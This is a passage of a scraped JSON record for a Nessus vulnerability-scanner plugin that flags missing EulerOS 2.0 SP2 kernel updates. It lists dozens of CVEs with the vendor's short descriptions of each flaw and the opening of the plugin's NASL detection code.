slc_bump in drivers/ net/can/slcan.c in the Linux kernel through 5.6.2. It allows attackers to read uninitialized can_frame data, potentially containing sensitive information from kernel stack memory, if the configuration lacks CONFIG_INIT_STACK_ALL, aka CID-b9258a2cece4.(CVE-2020-11494)An issue was discovered in the Linux kernel through 5.6.2.\n mpol_parse_str in mm/mempolicy.c has a stack-based out-of-bounds write because an empty nodelist is mishandled during mount option parsing, aka CID-aa9f7d5172fa. NOTE: Someone in the security community disagrees that this is a vulnerability because the issue 'is a bug in parsing mount options which can only be specified by a privileged user, so triggering the bug does not grant any powers not already held.'.(CVE-2020-11565)In the Linux kernel before 5.4.12, drivers/input/input.c has out-of-bounds writes via a crafted keycode table, as demonstrated by input_set_keycode, aka CID-cb222aed03d7.(CVE-2019-20636)An issue was discovered in the Linux kernel before 5.6.1.\n drivers/media/usb/gspca/ov519.c allows NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs when there are zero endpoints, aka CID-998912346c0d.(CVE-2020-11608)An issue was discovered in the stv06xx subsystem in the Linux kernel before 5.6.1. drivers/media/usb/gspca/stv06xx/stv06xx.c and drivers/media/usb/gspca/stv06xx/stv06xx_pb0100.c mishandle invalid descriptors, as demonstrated by a NULL pointer dereference, aka CID-485b06aadb93.(CVE-2020-11609)In the Linux kernel before 5.6.1, drivers/media/usb/gspca/xirlink_cit.c (aka the Xirlink camera USB driver) mishandles invalid descriptors, aka CID-a246b4d54770.(CVE-2020-11668)A flaw was found in the Linux kernel's implementation of GRO. This flaw allows an attacker with local access to crash the system.(CVE-2020-10720)gadget_dev_desc_UDC_store in drivers/usb/gadget/configfs.c in the Linux kernel through 5.6.13 relies on kstrdup without considering the possibility of an internal '\\0' value, which allows attackers to trigger an out-of-bounds read, aka CID-15753588bcd4.(CVE-2020-13143)An issue was discovered in the Linux kernel through 5.6.11. sg_write lacks an sg_remove_request call in a certain failure case, aka CID-83c6f2390040.(CVE-2020-12770)A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.(CVE-2020-12826)The fix for CVE-2019-11599, affecting the Linux kernel before 5.0.10 was not complete. A local user could use this flaw to obtain sensitive information, cause a denial of service, or possibly have other unspecified impacts by triggering a race condition with mmget_not_zero or get_task_mm calls.(CVE-2019-14898)usb_sg_cancel in drivers/usb/core/message.c in the Linux kernel before 5.6.8 has a use-after-free because a transfer occurs without a reference, aka CID-056ad39ee925.(CVE-2020-12464)The __mptctl_ioctl function in drivers/message/fusion/mptctl.c in the Linux kernel before 5.4.14 allows local users to hold an incorrect lock during the ioctl operation and trigger a race condition, i.e., a 'double fetch' vulnerability, aka CID-28d76df18f0a. NOTE: the vendor states 'The security impact of this bug is not as bad as it could have been because these operations are all privileged and root already has enormous destructive power.'(CVE-2020-12652)An issue was found in Linux kernel before 5.5.4. The mwifiex_cmd_append_vsie_tlv() function in drivers/ net/wireless/marvell/mwifiex/scan.c allows local users to gain privileges or cause a denial of service because of an incorrect memcpy and buffer overflow, aka CID-b70261a288ea.(CVE-2020-12653)An issue was found in Linux kernel before 5.5.4. mwifiex_ret_wmm_get_status() in drivers/ net/wireless/marvell/mwifiex/wmm.c allows a remote AP to trigger a heap-based buffer overflow because of an incorrect memcpy, aka CID-3a9b153c5591.(CVE-2020-12654)An issue was discovered in xfs_agf_verify in fs/xfs/libxfs/xfs_alloc.c in the Linux kernel through 5.6.10. Attackers may trigger a sync of excessive duration via an XFS v5 image with crafted metadata, aka CID-d0c7feaf8767.(CVE-2020-12655)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-06-17T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : kernel (EulerOS-SA-2020-1674)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-3180", "CVE-2014-4508", "CVE-2014-4608", "CVE-2014-5206", "CVE-2014-5207", "CVE-2014-7970", "CVE-2016-3951", "CVE-2016-9756", "CVE-2017-12153", "CVE-2017-13080", "CVE-2017-13693", "CVE-2017-8068", "CVE-2018-1000204", "CVE-2018-13093", "CVE-2018-9383", "CVE-2018-9389", "CVE-2019-10220", "CVE-2019-11599", "CVE-2019-14895", "CVE-2019-14896", "CVE-2019-14897", "CVE-2019-14898", "CVE-2019-14901", "CVE-2019-16230", "CVE-2019-18675", "CVE-2019-19054", "CVE-2019-19056", "CVE-2019-19057", "CVE-2019-19060", "CVE-2019-19062", "CVE-2019-19063", "CVE-2019-19066", "CVE-2019-19073", "CVE-2019-19074", "CVE-2019-19227", "CVE-2019-19319", "CVE-2019-19332", "CVE-2019-19523", "CVE-2019-19524", "CVE-2019-19527", "CVE-2019-19528", "CVE-2019-19530", "CVE-2019-19531", "CVE-2019-19532", "CVE-2019-19533", "CVE-2019-19534", "CVE-2019-19536", "CVE-2019-19537", "CVE-2019-19768", "CVE-2019-19922", "CVE-2019-19965", "CVE-2019-19966", "CVE-2019-20054", "CVE-2019-20096", "CVE-2019-20636", "CVE-2019-2215", "CVE-2019-5108", "CVE-2019-9458", "CVE-2020-10720", "CVE-2020-10942", "CVE-2020-11494", "CVE-2020-11565", "CVE-2020-11608", "CVE-2020-11609", "CVE-2020-11668", "CVE-2020-12464", "CVE-2020-12652", "CVE-2020-12653", "CVE-2020-12654", "CVE-2020-12655", "CVE-2020-12770", "CVE-2020-12826", "CVE-2020-13143", "CVE-2020-2732", "CVE-2020-8647", "CVE-2020-8648", "CVE-2020-8649", "CVE-2020-8992", "CVE-2020-9383"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:kernel-debug-devel", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-1674.NASL", "href": "https://www.tenable.com/plugins/nessus/137516", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137516);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2014-3180\",\n \"CVE-2014-4508\",\n \"CVE-2014-4608\",\n \"CVE-2014-5206\",\n \"CVE-2014-5207\",\n \"CVE-2014-7970\",\n \"CVE-2016-3951\",\n \"CVE-2016-9756\",\n \"CVE-2017-12153\",\n \"CVE-2017-13080\",\n \"CVE-2017-13693\",\n \"CVE-2017-8068\",\n \"CVE-2018-1000204\",\n \"CVE-2018-13093\",\n \"CVE-2018-9383\",\n \"CVE-2018-9389\",\n \"CVE-2019-10220\",\n \"CVE-2019-14895\",\n \"CVE-2019-14896\",\n \"CVE-2019-14897\",\n \"CVE-2019-14898\",\n \"CVE-2019-14901\",\n \"CVE-2019-16230\",\n \"CVE-2019-18675\",\n \"CVE-2019-19054\",\n \"CVE-2019-19056\",\n \"CVE-2019-19057\",\n \"CVE-2019-19060\",\n \"CVE-2019-19062\",\n \"CVE-2019-19063\",\n \"CVE-2019-19066\",\n \"CVE-2019-19073\",\n \"CVE-2019-19074\",\n \"CVE-2019-19227\",\n \"CVE-2019-19319\",\n \"CVE-2019-19332\",\n \"CVE-2019-19523\",\n \"CVE-2019-19524\",\n \"CVE-2019-19527\",\n \"CVE-2019-19528\",\n \"CVE-2019-19530\",\n \"CVE-2019-19531\",\n \"CVE-2019-19532\",\n \"CVE-2019-19533\",\n \"CVE-2019-19534\",\n \"CVE-2019-19536\",\n \"CVE-2019-19537\",\n \"CVE-2019-19768\",\n \"CVE-2019-19922\",\n \"CVE-2019-19965\",\n \"CVE-2019-19966\",\n \"CVE-2019-20054\",\n \"CVE-2019-20096\",\n \"CVE-2019-20636\",\n \"CVE-2019-2215\",\n \"CVE-2019-5108\",\n \"CVE-2019-9458\",\n \"CVE-2020-10720\",\n \"CVE-2020-10942\",\n \"CVE-2020-11494\",\n \"CVE-2020-11565\",\n \"CVE-2020-11608\",\n \"CVE-2020-11609\",\n \"CVE-2020-11668\",\n \"CVE-2020-12464\",\n \"CVE-2020-12652\",\n \"CVE-2020-12653\",\n \"CVE-2020-12654\",\n \"CVE-2020-12655\",\n \"CVE-2020-12770\",\n \"CVE-2020-12826\",\n \"CVE-2020-13143\",\n \"CVE-2020-2732\",\n \"CVE-2020-8647\",\n \"CVE-2020-8648\",\n \"CVE-2020-8649\",\n \"CVE-2020-8992\",\n \"CVE-2020-9383\"\n );\n script_bugtraq_id(\n 68126,\n 68214,\n 69214,\n 69216,\n 70319\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"EulerOS 2.0 SP2 : kernel (EulerOS-SA-2020-1674)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz),\n the core of any Linux operating system. The kernel\n handles the basic functions of the operating system:\n memory allocation, process allocation, device input and\n output, etc.Security Fix(es):In the Linux kernel before\n 5.5.8, get_raw_socket in drivers/vhost/ net.c lacks\n validation of an sk_family field, which might allow\n attackers to trigger kernel stack corruption via\n crafted system calls.(CVE-2020-10942)In the Linux\n kernel 5.0.21, a setxattr operation, after a mount of a\n crafted ext4 image, can cause a slab-out-of-bounds\n write access because of an ext4_xattr_set_entry\n use-after-free in fs/ext4/xattr.c when a large old_size\n value is used in a memset call.(CVE-2019-19319)In\n kernel/compat.c in the Linux kernel before 3.17, as\n used in Google Chrome OS and other products, there is a\n possible out-of-bounds read. restart_syscall uses\n uninitialized data when restarting\n compat_sys_nanosleep. NOTE: this is disputed because\n the code path is unreachable.(CVE-2014-3180)In the\n Linux kernel 5.4.0-rc2, there is a use-after-free\n (read) in the __blk_add_trace function in\n kernel/trace/blktrace.c (which is used to fill out a\n blk_io_trace structure and place it in a per-cpu\n sub-buffer).(CVE-2019-19768)There is a use-after-free\n vulnerability in the Linux kernel through 5.5.2 in the\n vc_do_resize function in\n drivers/tty/vt/vt.c.(CVE-2020-8647)There is a\n use-after-free vulnerability in the Linux kernel\n through 5.5.2 in the vgacon_invert_region function in\n drivers/video/console/vgacon.c.(CVE-2020-8649)drivers/g\n pu/drm/radeon/radeon_display.c in the Linux kernel\n 5.2.14 does not check the alloc_workqueue return value,\n leading to a NULL pointer dereference. NOTE: A\n third-party software maintainer states that the work\n queue allocation is happening during device\n initialization, which for a graphics card occurs during\n boot. It is not attacker controllable and OOM at that\n time is highly unlikely.(CVE-2019-16230)There is a\n use-after-free vulnerability in the Linux kernel\n through 5.5.2 in the n_tty_receive_buf_common function\n in drivers/tty/ n_tty.c.(CVE-2020-8648)A flaw was\n discovered in the way that the KVM hypervisor handled\n instruction emulation for an L2 guest when nested\n virtualisation is enabled. Under some circumstances, an\n L2 guest may trick the L0 guest into accessing\n sensitive L1 resources that should be inaccessible to\n the L2 guest.(CVE-2020-2732)An issue was discovered in\n the Linux kernel through 5.5.6. set_fdc in\n drivers/block/floppy.c leads to a wait_til_ready\n out-of-bounds read because the FDC index is not checked\n for errors before assigning it, aka\n CID-2e90ca68b0d2.(CVE-2020-9383)ext4_protect_reserved_i\n node in fs/ext4/block_validity.c in the Linux kernel\n through 5.5.3 allows attackers to cause a denial of\n service (soft lockup) via a crafted journal\n size.(CVE-2020-8992)Wi-Fi Protected Access (WPA and\n WPA2) allows reinstallation of the Group Temporal Key\n (GTK) during the group key handshake, allowing an\n attacker within radio range to replay frames from\n access points to clients.(CVE-2017-13080)Linux Kernel\n version 3.18 to 4.16 incorrectly handles an SG_IO ioctl\n on /dev/sg0 with dxfer_direction=SG_DXFER_FROM_DEV and\n an empty 6-byte cmdp. This may lead to copying up to\n 1000 kernel heap pages to the userspace. This has been\n fixed upstream in\n https://github.com/torvalds/linux/commit/a45b599ad808c3\n c982fdcdc12b0b8611c2f92824 already. The problem has\n limited scope, as users don't usually have permissions\n to access SCSI devices. On the other hand, e.g. the\n Nero user manual suggests doing `chmod o+r+w /dev/sg*`\n to make the devices accessible. NOTE: third parties\n dispute the relevance of this report, noting that the\n requirement for an attacker to have both the\n CAP_SYS_ADMIN and CAP_SYS_RAWIO capabilities makes it\n 'virtually impossible to exploit.'(CVE-2018-1000204)The\n Linux kernel through 5.3.13 has a start_offset+size\n Integer Overflow in cpia2_remap_buffer in\n drivers/media/usb/cpia2/cpia2_core.c because cpia2 has\n its own mmap implementation. This allows local users\n (with /dev/video0 access) to obtain read and write\n permissions on kernel physical pages, which can\n possibly result in a privilege\n escalation.(CVE-2019-18675)arch/x86/kvm/emulate.c in\n the Linux kernel before 4.8.12 does not properly\n initialize Code Segment (CS) in certain error cases,\n which allows local users to obtain sensitive\n information from kernel stack memory via a crafted\n application.(CVE-2016-9756)Double free vulnerability in\n drivers/ net/usb/cdc_ncm.c in the Linux kernel before\n 4.5 allows physically proximate attackers to cause a\n denial of service (system crash) or possibly have\n unspecified other impact by inserting a USB device with\n an invalid USB descriptor.(CVE-2016-3951)Linux Kernel\n contains an out-of-bounds read flaw in the\n asn1_ber_decoder() function in lib/asn1_decoder.c that\n is triggered when decoding ASN.1 data. This may allow a\n remote attacker to disclose potentially sensitive\n memory contents.(CVE-2018-9383)Linux Kernel contains a\n flaw in the ip6_setup_cork() function in\n net/ipv6/ip6_output.c that is triggered when handling\n too small IPv6 MTU sizes. This may allow a local\n attacker to cause a crash or potentially gain elevated\n privileges.(CVE-2018-9389)In the Android kernel in the\n video driver there is a use after free due to a race\n condition. This could lead to local escalation of\n privilege with no additional execution privileges\n needed. User interaction is not needed for\n exploitation.(CVE-2019-9458)An out-of-bounds memory\n write issue was found in the Linux Kernel, version 3.13\n through 5.4, in the way the Linux kernel's KVM\n hypervisor handled the 'KVM_GET_EMULATED_CPUID'\n ioctl(2) request to get CPUID features emulated by the\n KVM hypervisor. A user or process able to access the\n '/dev/kvm' device could use this flaw to crash the\n system, resulting in a denial of\n service.(CVE-2019-19332)kernel/sched/fair.c in the\n Linux kernel before 5.3.9, when cpu.cfs_quota_us is\n used (e.g., with Kubernetes), allows attackers to cause\n a denial of service against non-cpu-bound applications\n by generating a workload that triggers unwanted slice\n expiration, aka CID-de53fd7aedb1. (In other words,\n although this slice expiration would typically be seen\n with benign workloads, it is possible that an attacker\n could calculate how many stray requests are required to\n force an entire Kubernetes cluster into a\n low-performance state caused by slice expiration, and\n ensure that a DDoS attack sent that number of stray\n requests. An attack does not affect the stability of\n the kernel it only causes mismanagement of application\n execution.)(CVE-2019-19922)An exploitable\n denial-of-service vulnerability exists in the Linux\n kernel prior to mainline 5.3. An attacker could exploit\n this vulnerability by triggering AP to send IAPP\n location updates for stations before the required\n authentication process has completed. This could lead\n to different denial-of-service scenarios, either by\n causing CAM table attacks, or by leading to traffic\n flapping if faking already existing clients in other\n nearby APs of the same wireless infrastructure. An\n attacker can forge Authentication and Association\n Request packets to trigger this\n vulnerability.(CVE-2019-5108)A heap-based buffer\n overflow vulnerability was found in the Linux kernel,\n version kernel-2.6.32, in Marvell WiFi chip driver. A\n remote attacker could cause a denial of service (system\n crash) or, possibly execute arbitrary code, when the\n lbs_ibss_join_existing function is called after a STA\n connects to an AP.(CVE-2019-14896)A stack-based buffer\n overflow was found in the Linux kernel, version\n kernel-2.6.32, in Marvell WiFi chip driver. An attacker\n is able to cause a denial of service (system crash) or,\n possibly execute arbitrary code, when a STA works in\n IBSS mode (allows connecting stations together without\n the use of an AP) and connects to another\n STA.(CVE-2019-14897)In the Linux kernel through 5.4.6,\n there is a NULL pointer dereference in\n drivers/scsi/libsas/sas_discover.c because of\n mishandling of port disconnection during discovery,\n related to a PHY down race condition, aka\n CID-f70267f379b5.(CVE-2019-19965)In the Linux kernel\n before 5.1.6, there is a use-after-free in cpia2_exit()\n in drivers/media/usb/cpia2/cpia2_v4l.c that will cause\n denial of service, aka\n CID-dea37a972655.(CVE-2019-19966)In the Linux kernel\n before 5.1, there is a memory leak in\n __feat_register_sp() in net/dccp/feat.c, which may\n cause denial of service, aka\n CID-1d3ff0950e2b.(CVE-2019-20096)In the Linux kernel\n before 5.0.6, there is a NULL pointer dereference in\n drop_sysctl_table() in fs/proc/proc_sysctl.c, related\n to put_links, aka\n CID-23da9588037e.(CVE-2019-20054)drivers/\n net/usb/pegasus.c in the Linux kernel 4.9.x before\n 4.9.11 interacts incorrectly with the CONFIG_VMAP_STACK\n option, which allows local users to cause a denial of\n service (system crash or memory corruption) or possibly\n have unspecified other impact by leveraging use of more\n than one virtual page for a DMA\n scatterlist.(CVE-2017-8068)A heap-based buffer overflow\n was discovered in the Linux kernel, all versions 3.x.x\n and 4.x.x before 4.18.0, in Marvell WiFi chip driver.\n The flaw could occur when the station attempts a\n connection negotiation during the handling of the\n remote devices country settings. This could allow the\n remote device to cause a denial of service (system\n crash) or possibly execute arbitrary\n code.(CVE-2019-14895)The acpi_ds_create_operands()\n function in drivers/acpi/acpica/dsutils.c in the Linux\n kernel through 4.12.9 does not flush the operand cache\n and causes a kernel stack dump, which allows local\n users to obtain sensitive information from kernel\n memory and bypass the KASLR protection mechanism (in\n the kernel through 4.9) via a crafted ACPI\n table.(CVE-2017-13693)Linux kernel CIFS implementation,\n version 4.9.0 is vulnerable to a relative paths\n injection in directory entry lists.(CVE-2019-10220)A\n heap overflow flaw was found in the Linux kernel, all\n versions 3.x.x and 4.x.x before 4.18.0, in Marvell WiFi\n chip driver. The vulnerability allows a remote attacker\n to cause a system crash, resulting in a denial of\n service, or execute arbitrary code. The highest threat\n with this vulnerability is with the availability of the\n system. If code execution occurs, the code will run\n with the permissions of root. This will affect both\n confidentiality and integrity of files on the\n system.(CVE-2019-14901)In the AppleTalk subsystem in\n the Linux kernel before 5.1, there is a potential NULL\n pointer dereference because register_snap_client may\n return NULL. This will lead to denial of service in\n net/appletalk/aarp.c and net/appletalk/ddp.c, as\n demonstrated by unregister_snap_client, aka\n CID-9804501fa122.(CVE-2019-19227)In the Linux kernel\n before 5.2.10, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/usb/class/cdc-acm.c driver, aka\n CID-c52873e5a1ef.(CVE-2019-19530)In the Linux kernel\n before 5.3.9, there are multiple out-of-bounds write\n bugs that can be caused by a malicious USB device in\n the Linux kernel HID drivers, aka CID-d9d4b1e46d95.\n This affects drivers/hid/hid-axff.c,\n drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c,\n drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c,\n drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c,\n drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c,\n drivers/hid/hid-logitech-hidpp.c,\n drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c,\n drivers/hid/hid-tmff.c, and\n drivers/hid/hid-zpff.c.(CVE-2019-19532)A use-after-free\n in binder.c allows an elevation of privilege from an\n application to the Linux Kernel. No user interaction is\n required to exploit this vulnerability, however\n exploitation does require either the installation of a\n malicious local application or a separate vulnerability\n in a network facing application.Product: AndroidAndroid\n ID: A-141720095(CVE-2019-2215)The do_remount function\n in fs/ namespace.c in the Linux kernel through 3.16.1\n does not maintain the MNT_LOCK_READONLY bit across a\n remount of a bind mount, which allows local users to\n bypass an intended read-only restriction and defeat\n certain sandbox protection mechanisms via a 'mount -o\n remount' command within a user\n namespace.(CVE-2014-5206)Multiple integer overflows in\n the lzo1x_decompress_safe function in\n lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor\n in the Linux kernel before 3.15.2 allow\n context-dependent attackers to cause a denial of\n service (memory corruption) via a crafted Literal Run.\n NOTE: the author of the LZO algorithms says 'the Linux\n kernel is *not* affected media hype.'(CVE-2014-4608)The\n pivot_root implementation in fs/ namespace.c in the\n Linux kernel through 3.17 does not properly interact\n with certain locations of a chroot directory, which\n allows local users to cause a denial of service\n (mount-tree loop) via . (dot) values in both arguments\n to the pivot_root system call.(CVE-2014-7970)A security\n flaw was discovered in nl80211_set_rekey_data()\n function in the Linux kernel since v3.1-rc1 through\n v4.13. This function does not check whether the\n required attributes are present in a netlink request.\n This request can be issued by a user with CAP_NET_ADMIN\n privilege and may result in NULL dereference and a\n system crash.(CVE-2017-12153)arch/x86/kernel/entry_32.S\n in the Linux kernel through 3.15.1 on 32-bit x86\n platforms, when syscall auditing is enabled and the sep\n CPU feature flag is set, allows local users to cause a\n denial of service (OOPS and system crash) via an\n invalid syscall number, as demonstrated by number\n 1000.(CVE-2014-4508)fs/ namespace.c in the Linux kernel\n through 3.16.1 does not properly restrict clearing\n MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\n MNT_ATIME_MASK during a remount of a bind mount, which\n allows local users to gain privileges, interfere with\n backups and auditing on systems that had atime enabled,\n or cause a denial of service (excessive filesystem\n updating) on systems that had atime disabled via a\n 'mount -o remount' command within a user\n namespace.(CVE-2014-5207)In the Linux kernel before\n 5.3.7, there is a use-after-free bug that can be caused\n by a malicious USB device in the\n drivers/usb/misc/adutux.c driver, aka\n CID-44efc269db79.(CVE-2019-19523)In the Linux kernel\n before 5.3.12, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/input/ff-memless.c driver, aka\n CID-fa3a5a1880c9.(CVE-2019-19524)In the Linux kernel\n before 5.2.10, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/hid/usbhid/hiddev.c driver, aka\n CID-9c09b214f30e.(CVE-2019-19527)In the Linux kernel\n before 5.3.7, there is a use-after-free bug that can be\n caused by a malicious USB device in the\n drivers/usb/misc/iowarrior.c driver, aka\n CID-edc4746f253d.(CVE-2019-19528)In the Linux kernel\n before 5.2.9, there is a use-after-free bug that can be\n caused by a malicious USB device in the\n drivers/usb/misc/yurex.c driver, aka\n CID-fc05481b2fca.(CVE-2019-19531)In the Linux kernel\n before 5.3.4, there is an info-leak bug that can be\n caused by a malicious USB device in the\n drivers/media/usb/ttusb-dec/ttusb_dec.c driver, aka\n CID-a10feaf8c464.(CVE-2019-19533)In the Linux kernel\n before 5.3.11, there is an info-leak bug that can be\n caused by a malicious USB device in the drivers/\n net/can/usb/peak_usb/pcan_usb_core.c driver, aka\n CID-f7a1337f0d29..(CVE-2019-19534)In the Linux kernel\n before 5.2.9, there is an info-leak bug that can be\n caused by a malicious USB device in the drivers/\n net/can/usb/peak_usb/pcan_usb_pro.c driver, aka\n CID-ead16e53c2f0.(CVE-2019-19536)In the Linux kernel\n before 5.2.10, there is a race condition bug that can\n be caused by a malicious USB device in the USB\n character device driver layer, aka CID-303911cfc5b9.\n This affects drivers/usb/core/file.c.(CVE-2019-19537)A\n memory leak in the cx23888_ir_probe() function in\n drivers/media/pci/cx23885/cx23888-ir.c in the Linux\n kernel through 5.3.11 allows attackers to cause a\n denial of service (memory consumption) by triggering\n kfifo_alloc() failures, aka\n CID-a7b2df76b42b.(CVE-2019-19054)A memory leak in the\n mwifiex_pcie_alloc_cmdrsp_buf() function in drivers/\n net/wireless/marvell/mwifiex/pcie.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption) by triggering\n mwifiex_map_pci_memory() failures, aka\n CID-db8fd2cde932.(CVE-2019-19056)Two memory leaks in\n the mwifiex_pcie_init_evt_ring() function in drivers/\n net/wireless/marvell/mwifiex/pcie.c in the Linux kernel\n through 5.3.11 allow attackers to cause a denial of\n service (memory consumption) by triggering\n mwifiex_map_pci_memory() failures, aka\n CID-d10dcb615c8e.(CVE-2019-19057)A memory leak in the\n adis_update_scan_mode() function in\n drivers/iio/imu/adis_buffer.c in the Linux kernel\n before 5.3.9 allows attackers to cause a denial of\n service (memory consumption), aka\n CID-ab612b1daf41.(CVE-2019-19060)A memory leak in the\n crypto_report() function in crypto/crypto_user_base.c\n in the Linux kernel through 5.3.11 allows attackers to\n cause a denial of service (memory consumption) by\n triggering crypto_report_alg() failures, aka\n CID-ffdde5932042.(CVE-2019-19062)Two memory leaks in\n the rtl_usb_probe() function in drivers/\n net/wireless/realtek/rtlwifi/usb.c in the Linux kernel\n through 5.3.11 allow attackers to cause a denial of\n service (memory consumption), aka\n CID-3f9361695113.(CVE-2019-19063)A memory leak in the\n bfad_im_get_stats() function in\n drivers/scsi/bfa/bfad_attr.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption) by triggering\n bfa_port_get_stats() failures, aka\n CID-0e62395da2bd.(CVE-2019-19066)Memory leaks in\n drivers/ net/wireless/ath/ath9k/htc_hst.c in the Linux\n kernel through 5.3.11 allow attackers to cause a denial\n of service (memory consumption) by triggering\n wait_for_completion_timeout() failures. This affects\n the htc_config_pipe_credits() function, the\n htc_setup_complete() function, and the\n htc_connect_service() function, aka\n CID-853acf7caf10.(CVE-2019-19073)A memory leak in the\n ath9k_wmi_cmd() function in drivers/\n net/wireless/ath/ath9k/wmi.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption), aka\n CID-728c1e2a05e4.(CVE-2019-19074)An issue was\n discovered in fs/xfs/xfs_icache.c in the Linux kernel\n through 4.17.3. There is a NULL pointer dereference and\n panic in lookup_slow() on a NULL inode->i_ops pointer\n when doing pathwalks on a corrupted xfs image. This\n occurs because of a lack of proper validation that\n cached inodes are free during\n allocation.(CVE-2018-13093)An issue was discovered in\n slc_bump in drivers/ net/can/slcan.c in the Linux\n kernel through 5.6.2. It allows attackers to read\n uninitialized can_frame data, potentially containing\n sensitive information from kernel stack memory, if the\n configuration lacks CONFIG_INIT_STACK_ALL, aka\n CID-b9258a2cece4.(CVE-2020-11494)An issue was\n discovered in the Linux kernel through 5.6.2.\n mpol_parse_str in mm/mempolicy.c has a stack-based\n out-of-bounds write because an empty nodelist is\n mishandled during mount option parsing, aka\n CID-aa9f7d5172fa. NOTE: Someone in the security\n community disagrees that this is a vulnerability\n because the issue 'is a bug in parsing mount options\n which can only be specified by a privileged user, so\n triggering the bug does not grant any powers not\n already held.'.(CVE-2020-11565)In the Linux kernel\n before 5.4.12, drivers/input/input.c has out-of-bounds\n writes via a crafted keycode table, as demonstrated by\n input_set_keycode, aka\n CID-cb222aed03d7.(CVE-2019-20636)An issue was\n discovered in the Linux kernel before 5.6.1.\n drivers/media/usb/gspca/ov519.c allows NULL pointer\n dereferences in ov511_mode_init_regs and\n ov518_mode_init_regs when there are zero endpoints, aka\n CID-998912346c0d.(CVE-2020-11608)An issue was\n discovered in the stv06xx subsystem in the Linux kernel\n before 5.6.1. drivers/media/usb/gspca/stv06xx/stv06xx.c\n and drivers/media/usb/gspca/stv06xx/stv06xx_pb0100.c\n mishandle invalid descriptors, as demonstrated by a\n NULL pointer dereference, aka\n CID-485b06aadb93.(CVE-2020-11609)In the Linux kernel\n before 5.6.1, drivers/media/usb/gspca/xirlink_cit.c\n (aka the Xirlink camera USB driver) mishandles invalid\n descriptors, aka CID-a246b4d54770.(CVE-2020-11668)A\n flaw was found in the Linux kernel's implementation of\n GRO. This flaw allows an attacker with local access to\n crash the\n system.(CVE-2020-10720)gadget_dev_desc_UDC_store in\n drivers/usb/gadget/configfs.c in the Linux kernel\n through 5.6.13 relies on kstrdup without considering\n the possibility of an internal '\\0' value, which allows\n attackers to trigger an out-of-bounds read, aka\n CID-15753588bcd4.(CVE-2020-13143)An issue was\n discovered in the Linux kernel through 5.6.11. sg_write\n lacks an sg_remove_request call in a certain failure\n case, aka CID-83c6f2390040.(CVE-2020-12770)A signal\n access-control issue was discovered in the Linux kernel\n before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in\n include/linux/sched.h is only 32 bits, an integer\n overflow can interfere with a do_notify_parent\n protection mechanism. A child process can send an\n arbitrary signal to a parent process in a different\n security domain. Exploitation limitations include the\n amount of elapsed time before an integer overflow\n occurs, and the lack of scenarios where signals to a\n parent process present a substantial operational\n threat.(CVE-2020-12826)The fix for CVE-2019-11599,\n affecting the Linux kernel before 5.0.10 was not\n complete. A local user could use this flaw to obtain\n sensitive information, cause a denial of service, or\n possibly have other unspecified impacts by triggering a\n race condition with mmget_not_zero or get_task_mm\n calls.(CVE-2019-14898)usb_sg_cancel in\n drivers/usb/core/message.c in the Linux kernel before\n 5.6.8 has a use-after-free because a transfer occurs\n without a reference, aka\n CID-056ad39ee925.(CVE-2020-12464)The __mptctl_ioctl\n function in drivers/message/fusion/mptctl.c in the\n Linux kernel before 5.4.14 allows local users to hold\n an incorrect lock during the ioctl operation and\n trigger a race condition, i.e., a 'double fetch'\n vulnerability, aka CID-28d76df18f0a. NOTE: the vendor\n states 'The security impact of this bug is not as bad\n as it could have been because these operations are all\n privileged and root already has enormous destructive\n power.'(CVE-2020-12652)An issue was found in Linux\n kernel before 5.5.4. The mwifiex_cmd_append_vsie_tlv()\n function in drivers/\n net/wireless/marvell/mwifiex/scan.c allows local users\n to gain privileges or cause a denial of service because\n of an incorrect memcpy and buffer overflow, 